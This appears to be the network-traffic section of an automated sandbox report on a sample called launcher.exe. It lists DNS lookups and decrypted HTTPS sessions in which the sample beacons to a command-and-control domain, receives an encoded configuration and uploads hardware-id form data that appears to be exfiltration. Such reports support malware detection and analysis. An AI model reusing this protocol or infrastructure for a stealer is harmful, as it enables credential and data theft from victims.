Dec 27, 2024 22:31:12.803493023 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.847333908 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.847412109 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.895347118 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:13.071007013 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:15.202732086 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:15.202816010 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:15.202920914 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:15.203063011 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:15.203079939 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:15.227835894 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:15.227869034 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:15.228091002 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:15.228698969 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:15.228710890 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:16.532474995 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:16.532547951 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:16.533705950 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:16.533711910 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:16.533936977 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:16.541003942 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:16.541018963 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:16.541063070 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.356688976 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.356744051 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.356817961 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.356847048 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.356931925 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:17.356931925 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:17.356961012 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.364876032 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.367177010 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:17.367185116 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.380168915 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.380240917 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.380382061 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:17.380388021 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.380435944 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:17.476494074 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.476592064 CET	443	49718	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:17.476774931 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:17.476774931 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:17.477286100 CET	49718	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:17.477298975 CET	443	49718	104.21.58.80	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 22:30:56.805799007 CET	53521	53	192.168.2.5	1.1.1.1
Dec 27, 2024 22:30:57.140602112 CET	53	53521	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 22:30:56.805799007 CET	192.168.2.5	1.1.1.1	0x4797	Standard query (0)	stingyerasjhru.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 22:30:57.140602112 CET	1.1.1.1	192.168.2.5	0x4797	No error (0)	stingyerasjhru.click		104.21.58.80	A (IP address)	IN (0x0001)	false
Dec 27, 2024 22:30:57.140602112 CET	1.1.1.1	192.168.2.5	0x4797	No error (0)	stingyerasjhru.click		172.67.157.249	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

stingyerasjhru.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	104.21.58.80	443	7104	C:\Users\user\Desktop\launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 21:30:58 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stingyerasjhru.click
2024-12-27 21:30:58 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 21:30:59 UTC	1137	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 21:30:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h6u9pd18ekv7kkjdcqf50o929k; expires=Tue, 22 Apr 2025 15:17:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2JvpUF6PbkA6zV%2FSn6IdLNwIWNG%2B4zf5R5FXk9KVj%2BXz2zf8NKQbFKVyeSGG7rvsZ8zTBM7rb65xEnnWABbP1ni5zLHZRp7haP%2ByS0sCYxqfHl%2FyVzsPqogoxbP8ACc8hYGQUSwU5g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8c6a3478e8c328-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1468&rtt_var=569&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=911&delivery_rate=1891191&cwnd=177&unsent_bytes=0&cid=9160975ef8f6751f&ts=773&x=0"
2024-12-27 21:30:59 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 21:30:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	104.21.58.80	443	7104	C:\Users\user\Desktop\launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 21:31:00 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: stingyerasjhru.click
2024-12-27 21:31:00 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 62 32 4a 73 59 57 74 76 58 33 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=pqZnKP--b2JsYWtvX3&j=
2024-12-27 21:31:01 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 21:31:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m07h04dlagu8ig2j3eq03m5282; expires=Tue, 22 Apr 2025 15:17:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6CjIO2jaHKES4Zt2VQjvMYMZbUGf%2FVhfjz%2B8P3T87LdrEmsRXf9CWOMeX33lpK15xJGLX5Le2RKtIMAYQ2wyyeQhqC15TdipvUL4SWPvBrhZkJggMgynmOP5fjwBn4z533y0W19F3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8c6a4139c617e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1633&rtt_var=638&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=956&delivery_rate=1680092&cwnd=232&unsent_bytes=0&cid=9da882128296a929&ts=770&x=0"
2024-12-27 21:31:01 UTC	238	IN	Data Raw: 32 64 31 65 0d 0a 68 6b 68 4c 2b 2f 59 39 63 69 37 64 66 53 4c 6c 70 36 30 4e 6f 6f 4a 52 41 2f 73 4a 6f 58 7a 47 48 6d 55 45 55 46 48 62 59 59 62 39 61 6a 33 5a 7a 41 6c 65 44 4b 34 59 41 4e 2f 54 33 33 6a 48 72 6e 4e 69 6e 79 75 62 47 71 64 79 46 6d 46 38 63 36 30 4d 70 4c 77 75 4b 70 65 46 57 46 34 4d 75 41 55 41 33 2f 7a 57 4c 38 66 73 63 7a 6e 5a 62 4d 73 65 70 33 49 48 5a 54 73 2b 71 77 33 6c 37 69 51 73 6b 35 4e 65 46 6b 2b 78 45 45 65 41 77 73 78 6e 7a 4f 73 38 61 35 59 72 6a 56 36 6a 5a 45 63 2b 63 68 79 2b 46 65 66 4c 4b 54 69 51 31 45 42 65 56 66 38 59 54 4d 65 64 6a 32 7a 48 34 44 31 6c 6e 32 4c 4a 46 4b 35 36 42 6d 41 36 49 62 49 48 37 75 34 71 4c 35 4b 5a 56 77 4a 43 75 78 64 4d 68 73 6a 4d Data Ascii: 2d1ehkhL+/Y9ci7dfSLlp60NooJRA/sJoXzGHmUEUFHbYYb9aj3ZzAleDK4YAN/T33jHrnNinyubGqdyFmF8c60MpLwuKpeFWF4MuAUA3/zWL8fscznZbMsep3IHZTs+qw3l7iQsk5NeFk+xEEeAwsxnzOs8a5YrjV6jZEc+chy+FefLKTiQ1EBeVf8YTMedj2zH4D1ln2LJFK56BmA6IbIH7u4qL5KZVwJCuxdMhsjM
2024-12-27 21:31:01 UTC	1369	IN	Data Raw: 4c 34 36 67 4e 48 6e 5a 4d 34 4e 4e 6c 6e 38 57 64 79 63 2b 71 51 57 6b 2b 32 51 77 32 5a 4e 54 55 42 54 2f 46 30 79 4a 77 4d 78 67 78 2b 45 7a 63 35 5a 72 77 42 61 73 65 41 31 70 50 54 79 33 43 65 50 73 49 79 36 57 6b 31 63 57 51 37 78 66 44 73 66 43 31 79 2b 59 6f 42 4e 78 6d 6d 6a 58 45 37 55 38 47 43 67 72 63 37 34 50 70 4c 78 71 4c 35 65 56 55 68 42 65 74 78 52 4c 67 74 66 45 5a 73 33 74 4d 32 79 54 5a 4d 41 65 6f 33 59 4e 61 54 67 33 74 41 37 69 35 43 70 70 31 39 52 59 43 41 7a 6e 58 32 4f 43 31 63 68 6a 31 71 49 4a 49 59 59 6c 32 6c 36 6a 63 45 63 2b 63 6a 75 38 41 4f 66 76 4a 53 71 52 6e 30 30 51 58 72 6b 53 52 5a 58 44 79 6d 48 4b 34 79 46 72 6c 32 33 41 46 36 39 31 41 6d 45 32 63 2f 64 44 34 2f 78 71 63 64 6d 31 55 68 74 41 74 51 68 41 78 39 71 Data Ascii: L46gNHnZM4NNln8Wdyc+qQWk+2Qw2ZNTUBT/F0yJwMxgx+Ezc5ZrwBaseA1pPTy3CePsIy6Wk1cWQ7xfDsfC1y+YoBNxmmjXE7U8GCgrc74PpLxqL5eVUhBetxRLgtfEZs3tM2yTZMAeo3YNaTg3tA7i5Cpp19RYCAznX2OC1chj1qIJIYYl2l6jcEc+cju8AOfvJSqRn00QXrkSRZXDymHK4yFrl23AF691AmE2c/dD4/xqcdm1UhtAtQhAx9q
2024-12-27 21:31:01 UTC	1369	IN	Data Raw: 43 46 74 6b 32 33 4d 45 36 67 38 53 53 59 31 4b 2f 6c 62 70 4d 34 70 50 5a 71 65 48 53 56 50 73 52 46 48 6b 59 58 51 49 64 6d 67 4e 47 33 5a 4d 34 4d 54 70 58 51 42 64 44 30 2b 75 67 33 71 36 79 38 6d 6b 5a 52 66 48 55 6d 37 46 45 75 45 79 4d 74 39 79 75 41 37 5a 4a 68 68 79 56 37 71 50 41 42 2b 63 6d 76 35 4d 76 50 76 61 42 79 61 6d 6c 45 58 57 76 38 41 44 70 36 46 79 47 4f 41 75 48 4e 73 6b 57 37 47 45 61 56 32 43 57 4d 34 50 37 45 4e 35 2f 59 6c 4c 5a 6d 59 56 78 70 42 73 52 74 49 6a 73 37 45 61 63 44 68 4f 53 48 58 4b 38 51 47 35 43 52 48 55 6a 55 2f 74 41 79 6d 30 53 6b 6e 6c 35 4e 4a 55 46 50 78 42 67 43 41 79 59 38 33 67 4f 77 36 59 5a 4a 68 78 78 36 6a 63 51 4a 6c 4e 54 43 30 42 4f 37 71 4c 53 32 56 6e 56 49 57 54 4c 67 62 52 5a 58 41 78 6d 50 4d Data Ascii: CFtk23ME6g8SSY1K/lbpM4pPZqeHSVPsRFHkYXQIdmgNG3ZM4MTpXQBdD0+ug3q6y8mkZRfHUm7FEuEyMt9yuA7ZJhhyV7qPAB+cmv5MvPvaByamlEXWv8ADp6FyGOAuHNskW7GEaV2CWM4P7EN5/YlLZmYVxpBsRtIjs7EacDhOSHXK8QG5CRHUjU/tAym0Sknl5NJUFPxBgCAyY83gOw6YZJhxx6jcQJlNTC0BO7qLS2VnVIWTLgbRZXAxmPM
2024-12-27 21:31:01 UTC	1369	IN	Data Raw: 38 72 33 46 43 39 50 41 42 71 63 6d 76 35 43 75 33 32 4a 43 65 51 6d 56 6b 59 53 37 45 53 53 34 48 4f 79 47 6a 47 37 54 74 73 6e 47 6a 43 47 71 35 75 42 47 30 34 50 72 4e 44 71 71 51 74 4d 64 6e 4d 48 7a 64 41 6c 67 39 62 6c 64 4f 50 63 49 37 35 63 32 61 56 4b 35 74 65 70 33 4d 4f 61 54 6f 37 74 67 7a 67 36 69 77 76 6c 4a 46 51 47 6c 36 33 45 55 32 4d 79 73 52 39 77 4f 30 33 62 5a 31 6a 79 42 54 6b 4d 6b 64 68 4b 6e 50 68 51 39 48 70 4a 53 6d 61 67 68 38 50 41 71 5a 66 52 34 75 46 6c 79 2f 4d 37 6a 4e 75 6c 57 66 49 46 71 56 77 43 57 45 33 4f 72 45 4c 39 75 55 75 49 5a 69 61 55 42 46 49 75 68 70 45 67 4d 48 4a 59 49 43 75 63 32 61 42 4b 35 74 65 69 31 73 79 4a 42 4d 4a 2b 52 79 71 2f 57 6f 75 6c 64 51 48 55 45 43 38 45 30 69 49 77 38 5a 6a 79 75 6b 34 62 Data Ascii: 8r3FC9PABqcmv5Cu32JCeQmVkYS7ESS4HOyGjG7TtsnGjCGq5uBG04PrNDqqQtMdnMHzdAlg9bldOPcI75c2aVK5tep3MOaTo7tgzg6iwvlJFQGl63EU2MysR9wO03bZ1jyBTkMkdhKnPhQ9HpJSmagh8PAqZfR4uFly/M7jNulWfIFqVwCWE3OrEL9uUuIZiaUBFIuhpEgMHJYICuc2aBK5tei1syJBMJ+Ryq/WouldQHUEC8E0iIw8Zjyuk4b
2024-12-27 21:31:01 UTC	1369	IN	Data Raw: 64 6f 48 6b 49 5a 7a 4d 31 71 77 54 74 39 69 51 6b 6c 70 78 58 47 55 32 37 47 6b 32 42 79 63 56 75 78 2b 34 39 61 64 6b 6c 67 78 6d 38 50 46 38 6d 45 79 4f 69 45 66 4c 70 43 79 53 57 31 45 42 65 56 66 38 59 54 4d 65 64 6a 32 62 53 35 44 35 7a 6b 47 7a 4e 45 61 64 75 42 6d 73 35 49 62 34 4d 34 4f 4d 6d 4c 35 61 53 58 68 56 47 73 78 68 46 6a 4d 72 44 4c 34 36 67 4e 48 6e 5a 4d 34 4d 77 72 32 38 51 5a 54 77 34 72 78 69 6b 2b 32 51 77 32 5a 4e 54 55 42 54 2f 48 45 75 4d 77 63 39 6a 77 4f 51 2b 59 59 74 6b 78 42 6d 74 64 78 56 73 4e 54 53 79 43 2b 2f 72 4c 44 75 56 6d 6b 30 56 58 71 31 66 44 73 66 43 31 79 2b 59 6f 41 56 6d 69 58 76 41 58 4a 56 71 42 48 41 35 50 72 56 44 2b 36 6f 7a 61 5a 36 59 48 30 67 4d 75 52 42 4a 68 4d 72 4f 5a 73 7a 74 4e 6d 69 63 61 73 Data Ascii: doHkIZzM1qwTt9iQklpxXGU27Gk2BycVux+49adklgxm8PF8mEyOiEfLpCySW1EBeVf8YTMedj2bS5D5zkGzNEaduBms5Ib4M4OMmL5aSXhVGsxhFjMrDL46gNHnZM4Mwr28QZTw4rxik+2Qw2ZNTUBT/HEuMwc9jwOQ+YYtkxBmtdxVsNTSyC+/rLDuVmk0VXq1fDsfC1y+YoAVmiXvAXJVqBHA5PrVD+6ozaZ6YH0gMuRBJhMrOZsztNmicas
2024-12-27 21:31:01 UTC	1369	IN	Data Raw: 4e 57 55 70 63 36 5a 4e 2f 61 51 74 4a 64 6e 4d 48 78 4e 4c 76 42 35 4b 6a 73 6e 41 61 4d 54 79 4f 57 61 4c 61 73 49 56 71 58 41 48 61 7a 38 35 75 41 72 70 36 43 63 75 6e 70 74 61 55 41 4c 2f 47 46 6a 48 6e 59 39 4f 7a 65 73 2f 4f 73 4d 72 33 46 43 39 50 41 42 71 63 6d 76 35 41 2b 37 68 49 43 53 61 6d 31 77 43 54 62 6b 4e 51 49 72 50 33 57 58 4c 35 54 35 73 6c 47 6a 46 47 4b 39 77 46 57 38 79 4d 4c 4a 44 71 71 51 74 4d 64 6e 4d 48 7a 4e 62 71 52 56 48 69 39 50 45 62 73 50 32 50 6e 48 5a 4a 59 4d 50 6f 32 31 48 50 69 51 6a 72 67 54 37 71 6a 4e 70 6e 70 67 66 53 41 79 35 46 6b 61 41 77 38 46 39 78 65 59 38 62 70 42 69 78 78 61 6e 66 41 4e 69 4e 54 61 36 44 2b 2f 6a 4b 53 61 64 6e 56 45 5a 51 2f 39 52 41 49 44 64 6a 7a 65 41 77 53 68 69 6c 57 61 44 41 65 70 Data Ascii: NWUpc6ZN/aQtJdnMHxNLvB5KjsnAaMTyOWaLasIVqXAHaz85uArp6CcunptaUAL/GFjHnY9Ozes/OsMr3FC9PABqcmv5A+7hICSam1wCTbkNQIrP3WXL5T5slGjFGK9wFW8yMLJDqqQtMdnMHzNbqRVHi9PEbsP2PnHZJYMPo21HPiQjrgT7qjNpnpgfSAy5FkaAw8F9xeY8bpBixxanfANiNTa6D+/jKSadnVEZQ/9RAIDdjzeAwShilWaDAep
2024-12-27 21:31:01 UTC	1369	IN	Data Raw: 48 4f 2b 47 36 53 38 61 67 6d 53 67 6c 6f 58 57 76 30 71 51 34 6e 4c 79 48 6d 41 2f 77 77 76 32 57 54 5a 58 76 78 46 48 69 59 31 50 2f 6c 62 70 50 45 74 4b 5a 36 4f 53 52 64 41 72 68 52 4e 69 2b 66 41 61 4e 62 6a 50 47 4b 49 59 6f 38 56 71 54 78 4a 4a 6a 55 72 2b 56 75 6b 79 79 30 2f 6d 72 74 63 41 55 58 2f 55 51 43 41 30 34 38 33 67 4e 35 7a 63 35 70 37 77 42 47 31 51 6b 63 2b 4b 77 33 35 43 50 4c 6a 4f 69 71 50 6e 31 49 63 58 59 46 66 47 4e 4f 58 6e 54 32 53 73 69 77 68 68 6c 53 4e 58 71 55 38 58 31 38 72 63 36 39 44 76 4c 5a 6b 61 59 76 55 42 31 41 4c 76 41 31 53 67 63 62 5a 62 49 66 65 44 55 61 50 59 63 51 4f 6f 32 73 49 4a 6e 78 7a 74 6b 4f 38 33 57 6f 67 6e 6f 39 4f 42 6b 47 76 47 41 43 34 69 34 39 33 67 4c 68 7a 56 4a 70 6c 7a 52 6d 79 62 55 70 42 Data Ascii: HO+G6S8agmSgloXWv0qQ4nLyHmA/wwv2WTZXvxFHiY1P/lbpPEtKZ6OSRdArhRNi+fAaNbjPGKIYo8VqTxJJjUr+Vukyy0/mrtcAUX/UQCA0483gN5zc5p7wBG1Qkc+Kw35CPLjOiqPn1IcXYFfGNOXnT2SsiwhhlSNXqU8X18rc69DvLZkaYvUB1ALvA1SgcbZbIfeDUaPYcQOo2sIJnxztkO83Wogno9OBkGvGAC4i493gLhzVJplzRmybUpB
2024-12-27 21:31:01 UTC	1369	IN	Data Raw: 54 61 32 69 73 6b 6c 74 68 52 47 30 79 34 44 31 61 63 69 63 64 73 32 76 6f 4e 58 37 4a 6e 78 52 6d 2b 65 77 46 41 45 6e 50 33 51 2b 75 6b 63 68 44 5a 33 42 38 76 41 76 38 48 41 4e 2b 46 2b 6d 7a 4f 37 6a 52 33 69 43 62 72 50 5a 35 47 52 55 6f 31 4a 76 73 33 34 2f 51 37 49 70 53 59 48 31 34 4d 75 56 38 59 31 34 75 50 61 39 47 67 61 7a 48 4c 4d 4a 5a 4e 38 79 78 56 65 58 77 71 2b 52 57 6b 76 48 68 6e 32 59 59 66 53 41 7a 34 48 46 4b 56 77 38 78 35 77 36 63 4e 58 37 35 6c 78 42 2b 79 62 42 42 70 44 41 32 73 41 4f 72 71 4c 54 2b 49 31 42 46 51 51 2f 39 48 65 63 65 4e 6a 31 43 4f 6f 43 73 68 77 53 76 32 48 61 70 79 41 48 41 6a 66 70 34 4e 34 2b 55 38 4f 59 36 62 48 31 34 4d 75 56 38 59 31 59 75 50 61 39 47 67 61 7a 48 4c 4d 4a 5a 4e 38 79 78 56 65 58 77 71 2b Data Ascii: Ta2isklthRG0y4D1acicds2voNX7JnxRm+ewFAEnP3Q+ukchDZ3B8vAv8HAN+F+mzO7jR3iCbrPZ5GRUo1Jvs34/Q7IpSYH14MuV8Y14uPa9GgazHLMJZN8yxVeXwq+RWkvHhn2YYfSAz4HFKVw8x5w6cNX75lxB+ybBBpDA2sAOrqLT+I1BFQQ/9HeceNj1COoCshwSv2HapyAHAjfp4N4+U8OY6bH14MuV8Y1YuPa9GgazHLMJZN8yxVeXwq+
2024-12-27 21:31:01 UTC	1369	IN	Data Raw: 67 4f 5a 53 62 57 46 4a 73 75 41 6c 44 78 34 75 50 59 34 43 34 63 32 43 54 65 38 34 52 6f 7a 41 41 66 44 56 7a 39 30 50 71 70 48 4a 70 6d 4a 35 50 48 55 4f 34 55 30 61 4a 79 34 39 77 6a 76 6c 7a 64 39 6b 7a 6b 46 44 6b 62 6b 63 2b 63 6e 53 36 45 66 62 69 4b 54 2b 61 30 32 45 75 59 61 30 59 55 49 53 48 2f 6d 4c 45 39 69 5a 69 69 57 7a 39 49 49 6c 75 41 48 59 78 63 59 67 56 35 2b 51 6b 4c 74 6e 61 48 77 67 4d 35 31 39 74 6c 63 4c 66 62 49 43 75 63 32 33 5a 4d 34 4d 54 74 6e 73 58 5a 58 34 30 6f 77 53 6b 2b 32 51 77 32 59 49 66 53 42 2f 78 58 31 4c 48 6e 59 38 6f 7a 75 30 79 59 70 64 6f 30 51 79 69 66 78 46 6c 64 51 32 48 4c 76 62 6a 4f 69 72 62 70 56 49 55 57 71 6f 63 55 49 44 37 38 55 4c 53 35 79 4e 69 32 30 66 45 45 36 68 43 4f 56 45 6a 4e 4b 6c 42 77 75 Data Ascii: gOZSbWFJsuAlDx4uPY4C4c2CTe84RozAAfDVz90PqpHJpmJ5PHUO4U0aJy49wjvlzd9kzkFDkbkc+cnS6EfbiKT+a02EuYa0YUISH/mLE9iZiiWz9IIluAHYxcYgV5+QkLtnaHwgM519tlcLfbICuc23ZM4MTtnsXZX40owSk+2Qw2YIfSB/xX1LHnY8ozu0yYpdo0QyifxFldQ2HLvbjOirbpVIUWqocUID78ULS5yNi20fEE6hCOVEjNKlBwu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49710	104.21.58.80	443	7104	C:\Users\user\Desktop\launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 21:31:02 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZUDCML0497F0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12804 Host: stingyerasjhru.click
2024-12-27 21:31:02 UTC	12804	OUT	Data Raw: 2d 2d 5a 55 44 43 4d 4c 30 34 39 37 46 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 42 30 42 31 38 42 42 37 32 46 39 36 44 44 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 5a 55 44 43 4d 4c 30 34 39 37 46 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 55 44 43 4d 4c 30 34 39 37 46 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 32 4a 73 59 57 74 76 58 33 0d 0a 2d 2d 5a 55 44 43 4d 4c 30 34 39 Data Ascii: --ZUDCML0497F0Content-Disposition: form-data; name="hwid"8AB0B18BB72F96DD962CEBBDF1A894EB--ZUDCML0497F0Content-Disposition: form-data; name="pid"2--ZUDCML0497F0Content-Disposition: form-data; name="lid"pqZnKP--b2JsYWtvX3--ZUDCML049
2024-12-27 21:31:03 UTC	1136	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 21:31:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kpimgia0m82a72dh6o5odihq0d; expires=Tue, 22 Apr 2025 15:17:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H50tPcqQwlICJq9zZJCaeqNydSZ53%2BaV8fMiatC1ILdpQCnwBy1ryX8Wa3anEhdIRpbM7RK6qvV67W4WKfjvGlJkz9H5QY3%2BfajZSXHju93S7fTsBTGjHz27xRKcNvW28EY58EikeA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8c6a4f2a324234-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1754&rtt_var=679&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2852&recv_bytes=13742&delivery_rate=1586094&cwnd=172&unsent_bytes=0&cid=b03491d742ed6f92&ts=1056&x=0"
2024-12-27 21:31:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 21:31:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	104.21.58.80	443	7104	C:\Users\user\Desktop\launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 21:31:05 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Z5Z53SHDMTW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15040 Host: stingyerasjhru.click
